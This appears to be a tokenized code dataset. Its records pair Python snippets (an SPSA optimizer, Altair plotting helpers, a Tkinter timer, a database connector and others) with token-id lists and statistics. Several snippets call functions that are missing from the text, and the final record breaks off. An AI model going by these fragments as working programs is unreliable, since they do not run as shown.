"""
from gfeat.utils import PCA_with_standard_sample_deviation_scaling
import numpy as np
import pandas as pd
import numpy.testing as npt
| [
37811,
198,
14402,
4217,
32,
62,
4480,
62,
1416,
4272,
198,
37811,
198,
198,
6738,
308,
27594,
13,
26791,
1330,
4217,
32,
62,
4480,
62,
20307,
62,
39873,
62,
7959,
3920,
62,
1416,
4272,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
... | 2.912281 | 57 |
import unittest
from hazelcast.hash import murmur_hash3_x86_32, hash_to_index
| [
11748,
555,
715,
395,
198,
198,
6738,
11595,
417,
2701,
13,
17831,
1330,
4636,
28582,
62,
17831,
18,
62,
87,
4521,
62,
2624,
11,
12234,
62,
1462,
62,
9630,
628
] | 2.666667 | 30 |
"""
settings.index
"""
import zoom
| [
37811,
198,
220,
220,
220,
6460,
13,
9630,
198,
37811,
198,
198,
11748,
19792,
198
] | 2.666667 | 15 |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import re
from paddlehub.common import utils
from paddlehub.common.downloader import default_downloader
from paddlehub.io.parser import yaml_parser
import paddlehub as hub
# Name of the YAML file listing downloadable resources on the hub server.
RESOURCE_LIST_FILE = "resource_list_file.yml"
# Lifetime of the cached resource list, in seconds (10 minutes).
CACHE_TIME = 60 * 10

# Module-level singleton used as the default server connection.
# NOTE(review): `HubServer` is not defined in this excerpt — presumably
# declared earlier in this module; confirm before relying on it.
default_hub_server = HubServer()
| [
2,
15069,
357,
66,
8,
13130,
220,
350,
37382,
47,
37382,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
1,
198,
2,
345,
743,
407,
779,
428,
2393,
2... | 3.639286 | 280 |
from tkinter import *
import time
root = Tk()
root.title("Tkinter 15min timer")
root.geometry("250x200")
count = 0
compliment = Label(root, text="")
compliment.grid(row=0, column=0)
totalLabel = Label(root, text=f'Total: {count} times')
totalLabel.grid(row=1, column=0)
Label(root, text="What good will I do from now?").grid(row=2, column=0)
Button(root, text="Start", command=start).grid(row=3, column=0)
root.mainloop()
| [
6738,
256,
74,
3849,
1330,
1635,
198,
11748,
640,
198,
198,
15763,
796,
309,
74,
3419,
198,
15763,
13,
7839,
7203,
51,
74,
3849,
1315,
1084,
19781,
4943,
198,
15763,
13,
469,
15748,
7203,
9031,
87,
2167,
4943,
198,
198,
9127,
796,
6... | 2.66875 | 160 |
import math
import numpy as np
from random import randint
from random import sample
import matplotlib.pyplot as plt
import matplotlib.path as mpath
import igraph as ig
from matplotlib import pylab
import pandas as pd
from scipy.stats import ks_2samp as kolmogorov_smirnov_similarity
# Retorna um indice gerados aleatoriamente e sem repetição dentro do intervalo de 0 a n.
# @param numero_total_de_vertices: numero total de vertices do grafo original
# P(f) é o tamanho do componente gigante apos remover uma taxa f de vértices.
# dado uma rede, atacamos os nós de maior grau até que não sobre nenhum. Retorna-se a taxa de nós removidos e o tcg.
# retorna o vértice de maior grau na rede.
# retorna o vértice de maior betweenness na rede.
# retorna o vértice de maior fluxo na rede.
# análise da taxa de remoção e do tamanho do componente gigante
# auxilia em simulações
# Métricas de Rede
# retorna um gráfico sobre o tamanho do componente gigante ao longo das perturbações aplicadas à rede.
# @param uma lista com o resultado dos ataques
# retorna um gráfico sobre o tamanho do componente gigante ao longo das perturbações aplicadas à rede.
# betweeness nas arestas.
# bridges
###################################################################
# Versão 2
# não analisa o estado atual da rede para efetuar a estratégia de ataque.
# ataques feitos com base no estado inicial da rede.
# analisa o estado atual da rede para efetuar a estratégia de ataque.
| [
11748,
10688,
198,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
4738,
1330,
43720,
600,
198,
6738,
4738,
1330,
6291,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
2603,
29487,
8019,
13,
6978,
355,
285,
6978... | 2.753623 | 552 |
import altair as alt
from altair.utils.schemapi import Undefined, UndefinedType
def _check_catplot_transform(transform, mark):
"""Check to make sure transform is valid for catplot.
Parameters
----------
transform : str or list of strings
Which transform to use. Valid entries are:
'ecdf'
'colored_ecdf'
'eccdf'
'colored_eccdf'
'colored_ecdf'
'box'
'jitter'
'swarm'
['box', 'jitter']
['box', 'swarm']
Returns
-------
output : str of list of string
Transform, as a sorted list if ['box', 'jitter'] or
['box', swarm'].
"""
if mark == 'boxplot':
if transform not in [None, Undefined, 'boxplot', 'box']:
raise RuntimeError('mark and transform do not match.')
transform = 'box'
mark = Undefined
if transform is None:
raise RuntimeError('`transform` must be specified.')
if type(transform) in [tuple, list]:
transform = sorted(transform)
if transform not in ['ecdf',
'colored_ecdf',
'eccdf',
'colored_eccdf',
'box',
'jitter',
'jitterbox']:
raise RuntimeError("""Invalid transform. Valid possibilities are:
'ecdf'
'ecdf_collection'
'colored_ecdf'
'box'
'jitter'
'jitterbox'""")
return transform, mark
def _check_catplot_sort(df, cat, sort):
"""Check to make sure sort is valid."""
if cat is None and sort != Undefined:
raise RuntimeError('No categorical variable was determined, so `sort` cannot be specified.')
if sort != Undefined:
cats = df[cat].unique()
if sorted(sort) != sorted(list(df[cat].unique())):
raise RuntimeError('`sort` must have an entry for every value of the categorical variable considered.')
def _check_mark(mark):
"""Check to make sure mark is valid."""
if mark not in ['point', 'circle', 'square', 'line']:
raise RuntimeError("""Invalid `mark`. Allowed values are:
'point'
'circle'
'square'
'line'""")
def _make_altair_encoding(x, encoding, **kwargs):
"""Specified kwargs overwrite what was originally in the encoding."""
if isinstance(x, encoding):
input_kwds = {key: item for key, item in x._kwds.items()
if item != Undefined}
return encoding(**{**input_kwds, **kwargs})
elif x is None:
return encoding(**kwargs)
else:
return encoding(x, **kwargs)
def _get_column_name(x):
"""Get the name of a column from Altair specification."""
if len(x.shorthand) > 1 and x.shorthand[-2] == ':':
return x.shorthand[:-2]
else:
return x.shorthand
def _make_color_encoding(encoding, cat, sort):
"""Make color encodings."""
if 'color' in encoding:
color = _make_altair_encoding(encoding['color'], alt.Color)
if _get_column_name(color) == cat:
color = _make_altair_encoding(color, alt.Color,
scale=_make_altair_encoding(
color._kwds['scale'],
encoding=alt.Scale,
domain=sort))
if _get_data_type(color) == UndefinedType:
color = _make_altair_encoding(color,
alt.Color,
type='nominal')
return color
else:
return Undefined
return color, cat
| [
11748,
5988,
958,
355,
5988,
198,
6738,
5988,
958,
13,
26791,
13,
1416,
4411,
15042,
1330,
13794,
18156,
11,
13794,
18156,
6030,
628,
198,
4299,
4808,
9122,
62,
9246,
29487,
62,
35636,
7,
35636,
11,
1317,
2599,
198,
220,
220,
220,
372... | 2.038856 | 1,853 |
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
h, w = map(int, readline().split())
a = [list(map(int, readline().split())) for _ in range(h)]
ans = float('inf')
for i in range(h):
for j in range(w):
v = check(i, j)
if v < ans:
ans = v
print(ans)
| [
11748,
25064,
198,
961,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
198,
961,
1370,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
1370,
198,
961,
6615,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
6615,
198,
17597,
13,
2617... | 2.287425 | 167 |
import numpy
import time
| [
11748,
299,
32152,
198,
11748,
640,
628
] | 3.714286 | 7 |
import time
from pathlib import Path
from tqdm import tqdm
import hydra
from omegaconf import DictConfig
# 言語処理
# import fasttext
# import fasttext.util
from transformers import BertTokenizer, BertModel
# データ処理
import numpy as np
import torch
@hydra.main(config_path="conf/preprocess", config_name="config")
if __name__=="__main__":
main() | [
11748,
640,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
11748,
25039,
198,
6738,
267,
28917,
7807,
69,
1330,
360,
713,
16934,
198,
198,
2,
5525,
101,
222,
45739,
252,
49035,
99,
49426,
228... | 2.7 | 130 |
from packetframer import PacketFramer
TEST_PATH = "/tmp/amazing_fifo"
framer = PacketFramer(
fh_read=open(TEST_PATH, "rb")
)
while True:
packet = framer.read_packet()
if not packet:
print("All done!")
break
print("Read", packet)
| [
6738,
19638,
19298,
263,
1330,
6400,
316,
21055,
263,
198,
198,
51,
6465,
62,
34219,
796,
12813,
22065,
14,
321,
4070,
62,
32041,
78,
1,
198,
198,
19298,
263,
796,
6400,
316,
21055,
263,
7,
198,
220,
220,
220,
277,
71,
62,
961,
28... | 2.273504 | 117 |
'''
log:
IndexError: list index out of range
#WRONG agent number is 99**n
#for i = 0 j = 0 at the start of the run,
#the line sum += data[i-1][j] is trying to read into negative list space that doesn't exist
'''
# blur ---------------------------------------
import matplotlib.pyplot
import random
data = []
processed_data = []
# Fill with random data.
for i in (range(0,99)):
datarow = []
for j in (range(0,99)):
datarow.append(random.randint(0,255))
data.append(datarow)
len(datarow)
len(data)
# Blur.
'''
for i in (range(0,99)):
datarow = []
for j in (range(0,99)):
#WRONG agent number is 99**n
#for i = 0 j = 0 at the start of the run,
#the line sum += data[i-1][j] is trying to read into negative list space that doesn't exist
'''
for i in (range(1,98)):
datarow = []
for j in (range(1,98)):
sum = data[i][j]
sum += data[i-1][j]
sum += data[i+1][j]
sum += data[i][j+1]
sum += data[i][j-1]
sum /= 5
datarow.append(sum)
processed_data.append(datarow)
matplotlib.pyplot.imshow(data)
matplotlib.pyplot.show()
matplotlib.pyplot.imshow(processed_data)
matplotlib.pyplot.show()
# End --------------------------------------- | [
7061,
6,
198,
6404,
25,
220,
198,
15732,
12331,
25,
1351,
6376,
503,
286,
2837,
198,
2,
18564,
18494,
5797,
1271,
318,
7388,
1174,
77,
198,
2,
1640,
1312,
796,
657,
474,
796,
657,
379,
262,
923,
286,
262,
1057,
11,
220,
198,
2,
... | 2.37911 | 517 |
import os
import subprocess
ROOT = os.path.dirname(os.path.dirname(__file__))
class NoApplication(tk.Frame):
"""An application to tell the client 'no'"""
def show_alert(title: str, content: str) -> None:
"""Show an alert message using the desktop notifier."""
subprocess.call(["notify-send", title, content])
def show_denied(program_name: str, reason: str) -> None:
"""Tell the user they can't open their program."""
root = tk.Tk(className="parentopticon")
app = NoApplication(
master=root,
program_name=program_name,
reason=reason)
app.mainloop()
| [
11748,
28686,
198,
11748,
850,
14681,
198,
198,
13252,
2394,
796,
28686,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
15908,
3672,
7,
834,
7753,
834,
4008,
198,
198,
4871,
1400,
23416,
7,
30488,
13,
19778,
2599,
198,
197,
37811,
... | 2.908163 | 196 |
import numpy as np
import unittest
from collections import OrderedDict
import bnpy
from AbstractEndToEndTest import AbstractEndToEndTest
| [
11748,
299,
32152,
355,
45941,
198,
11748,
555,
715,
395,
198,
6738,
17268,
1330,
14230,
1068,
35,
713,
198,
198,
11748,
275,
77,
9078,
198,
6738,
27741,
12915,
2514,
12915,
14402,
1330,
27741,
12915,
2514,
12915,
14402,
628
] | 3.657895 | 38 |
#Text Encryption Project
#Created by MyKoh
#2017-09-24
words = raw_input("Please enter words in small letter you wish to encrypt")
#To encrypt to numbers in sequence ie: 'a' = 1
#To encrypt to ASCII codes
textToNumberConversion()
| [
2,
8206,
14711,
13168,
4935,
198,
2,
41972,
416,
2011,
42,
1219,
198,
2,
5539,
12,
2931,
12,
1731,
198,
198,
10879,
796,
8246,
62,
15414,
7203,
5492,
3802,
2456,
287,
1402,
3850,
345,
4601,
284,
34117,
4943,
198,
198,
2,
2514,
34117... | 3.295775 | 71 |
from datetime import datetime
from . import update_one, find_one, delete_one, make_id
| [
6738,
4818,
8079,
1330,
4818,
8079,
198,
6738,
764,
1330,
4296,
62,
505,
11,
1064,
62,
505,
11,
12233,
62,
505,
11,
787,
62,
312,
628,
628
] | 3.296296 | 27 |
import ipcalc
import sys
# Pull address from input
# addrString = raw_input("Address (x.x.x.x/x): ")
addrString = sys.argv[1]
#Pull netmask
subnet = ipcalc.Network(addrString)
# Generate empty list
AddrList = []
# Append items to the list
for x in ipcalc.Network(addrString):
AddrList.append(str(x))
# Print it out all pretty-like
print("Network: " , str(subnet.network()))
print("Address Range: " , AddrList[0], " - " , AddrList[-1])
print("Usable Addresses: ", len(AddrList))
print("Netmask: " , str(subnet.netmask())) | [
11748,
20966,
9948,
66,
198,
11748,
25064,
198,
198,
2,
21429,
2209,
422,
5128,
198,
2,
37817,
10100,
796,
8246,
62,
15414,
7203,
20231,
357,
87,
13,
87,
13,
87,
13,
87,
14,
87,
2599,
366,
8,
198,
29851,
10100,
796,
25064,
13,
853... | 2.706186 | 194 |
# Copyright 2021 The TensorFlow Quantum Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The SPSA minimization algorithm"""
import collections
import tensorflow as tf
import numpy as np
def prefer_static_shape(x):
"""Return static shape of tensor `x` if available,
else `tf.shape(x)`.
Args:
x: `tf.Tensor` (already converted).
Returns:
Numpy array (if static shape is obtainable), else `tf.Tensor`.
"""
return prefer_static_value(tf.shape(x))
def prefer_static_value(x):
"""Return static value of tensor `x` if available, else `x`.
Args:
x: `tf.Tensor` (already converted).
Returns:
Numpy array (if static value is obtainable), else `tf.Tensor`.
"""
static_x = tf.get_static_value(x)
if static_x is not None:
return static_x
return x
SPSAOptimizerResults = collections.namedtuple(
'SPSAOptimizerResults',
[
'converged',
# Scalar boolean tensor indicating whether the minimum
# was found within tolerance.
'num_iterations',
# The number of iterations of the SPSA update.
'num_objective_evaluations',
# The total number of objective
# evaluations performed.
'position',
# A tensor containing the last argument value found
# during the search. If the search converged, then
# this value is the argmin of the objective function.
# A tensor containing the value of the objective from
# previous iteration
'objective_value_previous_iteration',
# Save the evaluated value of the objective function
# from the previous iteration
'objective_value',
# A tensor containing the value of the objective
# function at the `position`. If the search
# converged, then this is the (local) minimum of
# the objective function.
'tolerance',
# Define the stop criteria. Iteration will stop when the
# objective value difference between two iterations is
# smaller than tolerance
'lr',
# Specifies the learning rate
'alpha',
# Specifies scaling of the learning rate
'perturb',
# Specifies the size of the perturbations
'gamma',
# Specifies scaling of the size of the perturbations
'blocking',
# If true, then the optimizer will only accept updates that improve
# the objective function.
'allowed_increase'
# Specifies maximum allowable increase in objective function
# (only applies if blocking is true).
])
def _get_initial_state(initial_position, tolerance, expectation_value_function,
lr, alpha, perturb, gamma, blocking, allowed_increase):
"""Create SPSAOptimizerResults with initial state of search."""
init_args = {
"converged": tf.Variable(False),
"num_iterations": tf.Variable(0),
"num_objective_evaluations": tf.Variable(0),
"position": tf.Variable(initial_position),
"objective_value": tf.Variable(0.),
"objective_value_previous_iteration": tf.Variable(np.inf),
"tolerance": tolerance,
"lr": tf.Variable(lr),
"alpha": tf.Variable(alpha),
"perturb": tf.Variable(perturb),
"gamma": tf.Variable(gamma),
"blocking": tf.Variable(blocking),
"allowed_increase": tf.Variable(allowed_increase)
}
return SPSAOptimizerResults(**init_args)
def minimize(expectation_value_function,
initial_position,
tolerance=1e-5,
max_iterations=200,
alpha=0.602,
lr=1.0,
perturb=1.0,
gamma=0.101,
blocking=False,
allowed_increase=0.5,
seed=None,
name=None):
"""Applies the SPSA algorithm.
The SPSA algorithm can be used to minimize a noisy function. See:
[SPSA website](https://www.jhuapl.edu/SPSA/)
Usage:
Here is an example of optimize a function which consists the
summation of a few quadratics.
>>> n = 5 # Number of quadractics
>>> coefficient = tf.random.uniform(minval=0, maxval=1, shape=[n])
>>> min_value = 0
>>> func = func = lambda x : tf.math.reduce_sum(np.power(x, 2) * \
coefficient)
>>> # Optimize the function with SPSA, start with random parameters
>>> result = tfq.optimizers.spsa_minimize(func, np.random.random(n))
>>> result.converged
tf.Tensor(True, shape=(), dtype=bool)
>>> result.objective_value
tf.Tensor(0.0013349084, shape=(), dtype=float32)
Args:
expectation_value_function: Python callable that accepts a real
valued tf.Tensor with shape [n] where n is the number of function
parameters. The return value is a real `tf.Tensor` Scalar
(matching shape `[1]`).
initial_position: Real `tf.Tensor` of shape `[n]`. The starting
point, or points when using batching dimensions, of the search
procedure. At these points the function value and the gradient
norm should be finite.
tolerance: Scalar `tf.Tensor` of real dtype. Specifies the tolerance
for the procedure. If the supremum norm between two iteration
vector is below this number, the algorithm is stopped.
a: Scalar `tf.Tensor` of real dtype. Specifies the learning rate
alpha: Scalar `tf.Tensor` of real dtype. Specifies scaling of the
learning rate.
c: Scalar `tf.Tensor` of real dtype. Specifies the size of the
perturbations.
gamma: Scalar `tf.Tensor` of real dtype. Specifies scaling of the
size of the perturbations.
blocking: Boolean. If true, then the optimizer will only accept
updates that improve the objective function.
allowed_increase: Scalar `tf.Tensor` of real dtype. Specifies maximum
allowable increase in objective function (only applies if blocking
is true).
name: (Optional) Python `str`. The name prefixed to the ops created
by this function. If not supplied, the default name 'minimize'
is used.
Returns:
optimizer_results: A SPSAOptimizerResults object contains the
result of the optimization process.
"""
with tf.name_scope(name or 'minimize'):
if seed is not None:
tf.random.set_seed(seed)
initial_position = tf.convert_to_tensor(initial_position,
name='initial_position',
dtype='float32')
dtype = initial_position.dtype.base_dtype
tolerance = tf.convert_to_tensor(tolerance,
dtype=dtype,
name='grad_tolerance')
max_iterations = tf.convert_to_tensor(max_iterations,
name='max_iterations')
lr_init = tf.convert_to_tensor(lr, name='initial_a', dtype='float32')
perturb_init = tf.convert_to_tensor(perturb,
name='initial_c',
dtype='float32')
def _spsa_once(state):
"""Caclulate single SPSA gradient estimation
Args:
state: A SPSAOptimizerResults object stores the
current state of the minimizer.
Returns:
states: A list which the first element is the new state
"""
delta_shift = tf.cast(
2 * tf.random.uniform(shape=state.position.shape,
minval=0,
maxval=2,
dtype=tf.int32) - 1, tf.float32)
v_m = expectation_value_function(state.position -
state.perturb * delta_shift)
v_p = expectation_value_function(state.position +
state.perturb * delta_shift)
gradient_estimate = (v_p - v_m) / (2 * state.perturb) * delta_shift
update = state.lr * gradient_estimate
state.num_objective_evaluations.assign_add(2)
current_obj = expectation_value_function(state.position - update)
if state.objective_value_previous_iteration + \
state.allowed_increase >= current_obj or not state.blocking:
state.position.assign(state.position - update)
state.objective_value_previous_iteration.assign(
state.objective_value)
state.objective_value.assign(current_obj)
return [state]
# The `state` here is a `SPSAOptimizerResults` tuple with
# values for the current state of the algorithm computation.
def _cond(state):
"""Continue if iterations remain and stopping condition
is not met."""
return (state.num_iterations < max_iterations) \
and (not state.converged)
def _body(state):
"""Main optimization loop."""
new_lr = lr_init / (
(tf.cast(state.num_iterations + 1, tf.float32) +
0.01 * tf.cast(max_iterations, tf.float32))**state.alpha)
new_perturb = perturb_init / (tf.cast(state.num_iterations + 1,
tf.float32)**state.gamma)
state.lr.assign(new_lr)
state.perturb.assign(new_perturb)
_spsa_once(state)
state.num_iterations.assign_add(1)
state.converged.assign(
tf.abs(state.objective_value -
state.objective_value_previous_iteration) <
state.tolerance)
return [state]
initial_state = _get_initial_state(initial_position, tolerance,
expectation_value_function, lr,
alpha, perturb, gamma, blocking,
allowed_increase)
initial_state.objective_value.assign(
tf.cast(expectation_value_function(initial_state.position),
tf.float32))
return tf.while_loop(cond=_cond,
body=_body,
loop_vars=[initial_state],
parallel_iterations=1)[0]
| [
2,
15069,
33448,
383,
309,
22854,
37535,
29082,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,... | 2.216163 | 5,061 |
import asyncio
from typing import Any, Dict, Optional, Set
from urllib.parse import urlencode
from aiohttp import ClientSession
from stonky.enums import CurrencyType
from stonky.exceptions import StonkyException
from stonky.stock import Stock
| [
11748,
30351,
952,
198,
6738,
19720,
1330,
4377,
11,
360,
713,
11,
32233,
11,
5345,
198,
6738,
2956,
297,
571,
13,
29572,
1330,
2956,
11925,
8189,
198,
198,
6738,
257,
952,
4023,
1330,
20985,
36044,
198,
198,
6738,
336,
261,
2584,
13,... | 3.514286 | 70 |
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DataSourceMetadata(Model):
"""Represents metadata for a Customer Insights data source.
Variables are only populated by the server, and will be ignored when
sending a request.
:param kind: Possible values include: 'salesforce', 'dynamics365',
'powerQuery', 'attachCdm', 'attachCds', 'powerPlatform', 'datahub'
:type kind: str or ~microsoft.dynamics.customerinsights.api.models.enum
:ivar is_active:
:vartype is_active: bool
:ivar entity_names:
:vartype entity_names: list[str]
:ivar data_source_id: Gets the unique identity for this object.
:vartype data_source_id: str
:ivar name: Gets the unique name of the dataSource.
:vartype name: str
:ivar friendly_name: Gets the friendlyName of the dataSource.
:vartype friendly_name: str
:ivar entity_information: Gets the entity information, by entity name.
:vartype entity_information:
list[~microsoft.dynamics.customerinsights.api.models.DatasourceEntityInformation]
:param provisioning_state: Possible values include: 'new', 'creating',
'active', 'createFailed', 'updateFailed', 'deleting',
'refreshCredentials', 'resetInstanceInProgress'
:type provisioning_state: str or
~microsoft.dynamics.customerinsights.api.models.enum
:ivar last_refresh: Gets the time datasource was last refreshed.
:vartype last_refresh: datetime
:param refresh_state: Possible values include: 'notUpdated', 'updated',
'updating', 'updateFailed', 'updateCancelled'
:type refresh_state: str or
~microsoft.dynamics.customerinsights.api.models.enum
:ivar incremental_refresh_properties: Gets the Incremental refresh
properties for entities.
:vartype incremental_refresh_properties:
list[~microsoft.dynamics.customerinsights.api.models.IncrementalRefreshProperties]
:ivar model_json_path: Gets the model path for CDM data source.
:vartype model_json_path: str
:ivar version: Gets the version number of this object.
:vartype version: long
:ivar updated_by: Gets the UPN of the user who last updated this record.
:vartype updated_by: str
:ivar updated_utc: Gets the time the object was last updated.
:vartype updated_utc: datetime
:ivar created_by: Gets the email address of the user who created this
record.
:vartype created_by: str
:ivar created_utc: Gets the time the object was initially created.
:vartype created_utc: datetime
:ivar instance_id: Gets the Customer Insights instance id associated with
this object.
:vartype instance_id: str
"""
_validation = {
'is_active': {'readonly': True},
'entity_names': {'readonly': True},
'data_source_id': {'readonly': True},
'name': {'readonly': True},
'friendly_name': {'readonly': True},
'entity_information': {'readonly': True},
'last_refresh': {'readonly': True},
'incremental_refresh_properties': {'readonly': True},
'model_json_path': {'readonly': True},
'version': {'readonly': True},
'updated_by': {'readonly': True},
'updated_utc': {'readonly': True},
'created_by': {'readonly': True},
'created_utc': {'readonly': True},
'instance_id': {'readonly': True},
}
_attribute_map = {
'kind': {'key': 'kind', 'type': 'str'},
'is_active': {'key': 'isActive', 'type': 'bool'},
'entity_names': {'key': 'entityNames', 'type': '[str]'},
'data_source_id': {'key': 'dataSourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'entity_information': {'key': 'entityInformation', 'type': '[DatasourceEntityInformation]'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'last_refresh': {'key': 'lastRefresh', 'type': 'iso-8601'},
'refresh_state': {'key': 'refreshState', 'type': 'str'},
'incremental_refresh_properties': {'key': 'incrementalRefreshProperties', 'type': '[IncrementalRefreshProperties]'},
'model_json_path': {'key': 'modelJsonPath', 'type': 'str'},
'version': {'key': 'version', 'type': 'long'},
'updated_by': {'key': 'updatedBy', 'type': 'str'},
'updated_utc': {'key': 'updatedUtc', 'type': 'iso-8601'},
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_utc': {'key': 'createdUtc', 'type': 'iso-8601'},
'instance_id': {'key': 'instanceId', 'type': 'str'},
}
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
16529,
35937,
198,
2,
6127,
7560,
416,
5413,
357,
49,
8,
11160,
19452,
6127,
35986,
13,
198,
2,
19179,
743,
2728,
11491,
4069,
290,
481,
307,
2626,
611,
262,
2438,
318,
198,
2,
16935,
515,
13,
... | 2.685542 | 1,819 |
n1 = int(input('me diga um numero: '))
n2 = int(input('me diga outro numero: '))
s = n1 + n2
print('a soma entre {} {} é {}'.format(n1, n2, s))
| [
77,
16,
796,
493,
7,
15414,
10786,
1326,
3100,
64,
23781,
997,
3529,
25,
705,
4008,
198,
77,
17,
796,
493,
7,
15414,
10786,
1326,
3100,
64,
503,
305,
997,
3529,
25,
705,
4008,
198,
82,
796,
299,
16,
1343,
299,
17,
198,
4798,
107... | 2.164179 | 67 |
from django.shortcuts import render, redirect, reverse
from django.views.generic.edit import FormView
from django.http import HttpResponse, Http404, HttpResponseRedirect
from app_noticias.forms import ContatoForm, TagForm, AddNoticiaForm
from django.contrib.auth.models import User
from app_noticias.models import Tag
from django import forms
from app_noticias.models import Noticia, MensagemDeContato, Tag
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
11,
18941,
11,
9575,
198,
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
19312,
1330,
5178,
7680,
198,
6738,
42625,
14208,
13,
4023,
1330,
367,
29281,
31077,
11,
367,
29281,
26429,
11,
36... | 3.436975 | 119 |
import time
import azure
import azure.batch.models as batch_models
import azure.batch.models.batch_error as batch_error
from aztk import error, models
from aztk.utils import constants, helpers
output_file = constants.TASK_WORKING_DIR + "/" + constants.SPARK_SUBMIT_LOGS_FILE
def __wait_for_app_to_be_running(batch_client, cluster_id: str, application_name: str) -> batch_models.CloudTask:
"""
Wait for the batch task to leave the waiting state into running(or completed if it was fast enough)
"""
while True:
task = batch_client.task.get(cluster_id, application_name)
if task.state is batch_models.TaskState.active or task.state is batch_models.TaskState.preparing:
# TODO: log
time.sleep(5)
else:
return task
| [
11748,
640,
198,
198,
11748,
35560,
495,
198,
11748,
35560,
495,
13,
43501,
13,
27530,
355,
15458,
62,
27530,
198,
11748,
35560,
495,
13,
43501,
13,
27530,
13,
43501,
62,
18224,
355,
15458,
62,
18224,
198,
198,
6738,
35560,
30488,
1330,... | 2.67893 | 299 |
'''
I heard that summing numbers in [0,1] until the total is >1 will
require an average of e numbers.
This code puts that to the test.
Hopefully pretty graphs, other visualisations, and optimisations
to be added later.
'''
import random
import math
# import matplotlib.pyplot as plt
# Generate a number in the range [0,1] inclusive
# One iteration of the theory; add numbers until their sum is >1, then
# return the amount of numbers needed
if __name__ == "__main__":
n = 1000 # Number of iterations
total_count = 0 # Used to calculate average
for i in range(n):
total_count += sum_until_1()
print("{} iterations: avg={} e={}".format(n, total_count/n, math.e))
| [
7061,
6,
198,
40,
2982,
326,
2160,
2229,
3146,
287,
685,
15,
11,
16,
60,
1566,
262,
2472,
318,
1875,
16,
481,
198,
46115,
281,
2811,
286,
304,
3146,
13,
198,
198,
1212,
2438,
7584,
326,
284,
262,
1332,
13,
198,
198,
32365,
2495,
... | 3.117117 | 222 |
from ..database.database_handler import DatabaseHandler as dataBaseHandler
from ..funcs.log import create_logger
from ..verific.verify_insertion import Verification
logger = create_logger('DatabaseConnector')
"""The database connector allows the network layer to access database functionality.
It is meant to be used mostly by logMerge and logSync for their purposes, however, others should feel free to
use it as well.
"""
class DatabaseConnector:
"""Database handler should be implemented by the network connection groups.
It has the private fields of a database handler to access the necessary database functionality.
"""
def add_event(self, event_as_cbor):
""""Add a cbor event to the two databases.
Calls each the byte array handler as well as the event handler to insert the event in both databases
accordingly. Gets called both by database connector as well as the function connector. Returns 1 if successful,
otherwise -1 if any error occurred.
"""
return self.__handler.add_to_db(event_as_cbor, False)
def get_current_seq_no(self, feed_id):
""""Return the current sequence number of a given feed_id, returns an integer with the currently largest
sequence number for the given feed. Returns -1 if there is no such feed_id in the database."""
return self.__handler.get_current_seq_no(feed_id)
def get_event(self, feed_id, seq_no):
""""Return a specific cbor event to the callee with the input feed_id and sequence number. Returns None if
there is no such entry."""
return self.__handler.get_event(feed_id, seq_no)
def get_current_event(self, feed_id):
"""Return the newest (the one with the highest sequence number) cbor event for a feed_id. Returns None if
there is no such feed_id in the database."""
return self.__handler.get_current_event_as_cbor(feed_id)
def get_all_feed_ids(self):
"""Return all current feed ids in the database."""
return self.__handler.get_all_feed_ids()
def check_incoming(self, feed_id, is_master=False):
""""Whether an incoming feed id is whitelisted, bool tells us whether it is a master feed or not."""
return self.__verifier.check_incoming(feed_id, is_master)
def check_outgoing(self, feed_id):
""""Whether an outgoing feed id is whitelisted, bool tells us whether it is a master feed or not."""
return self.__verifier.check_outgoing(feed_id)
| [
6738,
11485,
48806,
13,
48806,
62,
30281,
1330,
24047,
25060,
355,
1366,
14881,
25060,
198,
6738,
11485,
12543,
6359,
13,
6404,
1330,
2251,
62,
6404,
1362,
198,
6738,
11485,
332,
811,
13,
332,
1958,
62,
28463,
295,
1330,
4643,
2649,
198... | 2.982456 | 855 |
# -*- coding: utf-8 -*-
"""Top-level package for Holographer."""
__author__ = """Gus Dunn"""
__email__ = 'w.gus.dunn@gmail.com'
__version__ = '0.0.2'
| [
2,
532,
9,
12,
